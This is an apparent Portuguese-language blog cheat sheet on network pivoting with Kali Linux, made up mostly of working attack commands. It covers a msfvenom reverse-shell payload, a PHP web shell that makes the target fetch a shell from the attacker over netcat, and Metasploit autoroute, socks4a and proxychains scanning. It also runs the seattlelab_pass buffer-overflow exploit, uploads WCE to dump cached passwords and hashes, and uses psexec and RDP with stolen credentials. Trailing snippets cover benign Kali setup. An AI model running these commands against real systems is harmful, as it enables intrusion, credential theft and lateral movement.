Pular para o conteúdo principal

Pivoting - Penetration Testing - KaliLinux

Visão geral

Pivoting refere-se à prática de cortar um computador em rede ou um servidor e, em seguida, usando esse host para atacar outros sistemas de computador dentro da rede. Ao lançar ataques de dentro da rede, o atacante ignora política de firewall e pode executar ataques que não seriam possíveis de fora da rede. Ao utilizar um sistema comprometido para lançar ataques a partir de, o atacante tem uma melhor perspectiva de permanecer despercebido e pode deixar menos de uma impressão digital.


Ferramentas

msfconsole -: https://www.offensive-security.com/metasploit-unleashed/msfconsole/
msfvenom -: https://www.offensive-security.com/metasploit-unleashed/msfvenom/
netcat -: https://nmap.org/ncat/
curl -: http://curl.haxx.se/
socks4a -: https://www.rapid7.com/db/modules/auxiliary/server/socks4a
proxychains -: https://github.com/rofl0r/proxychains-ng
nmap -: https://nmap.org/
seattlelab_pass -: https://www.rapid7.com/db/modules/exploit/windows/pop3/seattlelab_pass
wce-universal -: http://www.ampliasecurity.com/research/wcefaq.html
psexec -: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
xfreerdp -: https://github.com/FreeRDP/FreeRDP

Falha joomla
http://resources.infosecinstitute.com/exploiting-cve-2015-8562-new-joomla-rce-2/

PDF
Penetration Testing with Kali Linux -: 
Tunneling Pivoting Web Application Penetration Testing -:

Obs:
Abra as porta no seu modem,

Comandos

Criando shell com msfvenom
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=porta -f elf > output

Enviando uma shell via netcat com shell.php
$ nc -lvp PORTA < shell
$ curl --silent http://target.com/shell.php?cmd=nc%20SEU_IP%20PORTA%20%3e%20shell
source shell.php <?php system($_GET['cmd']); ?>

Iniciando postgresql
/etc/init.d/postgresql start

Iniciando msfconsole para receber conexao
$ msfconsole -r resource.rc -q
code resource.rc
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST SEU_IP
set LPORT PORTA
set ExitOnSession false
exploit -j -z

Conectando uma sessão
msf > sessions -i numero da sessão

Ver e a adicionar rotas
meterpreter > route
meterpreter > run autoroute -s subnet/24
meterpreter > run autoroute -p

Execulatndo socks4a
meterpreter > background
msf > use auxiliary/server/socks4a
msf > run

Editando proxychains.conf
$ nano/etc/proxychains.conf
edit  a ultima linha para  socks4  127.0.0.1 1080

Visualizar portas forwards
$ netstat -nlpt

Fazendo um scanner com proxychains e nmap na subnet
$ proxychains nmap -v -sT -Pn subnet/24

Habilitando forward para porta filtradas
use uma sessão
meterpreter > portfwd add -l LOCAL_PORTA -p PORTA_FILTRADA -r IP_TARGET

Usando exploit para SMAIL com Buffer Overflow
msf > use exploit/windows/pop3/seattlelab_pass
msf > set RHOST IP_TARGET
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LPORT PORTA
msf > set LHOST SEU_IP
msf >  exploit

Upando wce para um servidor windows
use um sessão em um windows
meterpreter > upload /usr/shere/wce/wce-universal.exe c:\

Execulatdo o WCE para pegar hash ou senhas em cache
meterpreter > shell
cd \
# wce-universal.exe -w -: para senhas em cache
# wce-universal.exe -: para hashs

Usando exploit psexec para uso de credenciais
msf > use exploit/windows/smb/psexec
msf > set RHOST IP_TARGET
msf > set SMBPass
msf > set SMBUser
msf > set SMBDomain
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST SEU_IP
msf > set LPORT PORTA
exploit

Usado xFreeRDP
xfreerdp /v:IP_TARGET /u:username /p:password /d:domain /w:800 /h:600

VIDEO






Comentários

Postagens mais visitadas deste blog

pós-Instalação kali Linux - Instalando ARCH THEME

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 2 - Instalando ARCH THEME   Comando $ echo 'deb http://download.opensuse.org/repositories/home:/Horst3180/Debian_8.0/ /' >> /etc/apt/sources.list.d/arc-theme.list $ wget http://download.opensuse.org/repositories/home:Horst3180/Debian_8.0/Release.key $ apt-key add - < Release.key $ apt-get update $ apt-get install arc-theme Fonte: https://software.opensuse.org/download.html?project=home%3AHorst3180&package=arc-theme

pós-Instalação kali Linux - apt-get update && apt-get upgrade

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 1 - Atualização do sistema, segui o video abaixo: Informações extras gedit é o editor oficial de texto plano para o GNOME. Ele assemelha-se, a princípio, com o bloco de notas do Windows, mas observando os detalhes pode-se notar que possui mais recursos. Como por exemplo: Numeração de linhas. Fonte : https://pt.wikipedia.org/wiki/Gedit source.list : Um arquivo muito importante para o sistema APT de Debian é /etc/apt/sources.list. Neste arquivo são indicadas as fontes de onde serão obtidos os pacotes de software a serem instalados no sistema. Fonte : http://www.tutoriaisti.com.br/sistemas-operacionais/linux/debian-arquivos-sources-list/ source.list Kali Linux http://docs.kali.org/general-use/kali-linux-sources-list-repositories apt-get update - Atualiza a lista de pacotes e programas que podem ser insta...

pós-Instalação kali Linux - VLC error - Adobe FlashPlayer

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 4 - Corrigindo error VLC + Instalndo AdobeFlashPlayer Comando para o corrigir o VLC $ sed -i 's/geteuid/getppid/' /usr/bin/vlc Comando para AdobeFlashPlayer $ tar -xf flash_player_npapi_linux.x86_64.tar.gz $ ls $  mv  LGPL /usr/lib/mozilla/plugins/ $  mv  libflashplayer.so /usr/lib/mozilla/plugins/ $  mv  usr /usr/lib/mozilla/plugins/ $  ls /usr/lib/mozilla/plugins/ Reiniciar o navegador e Pronto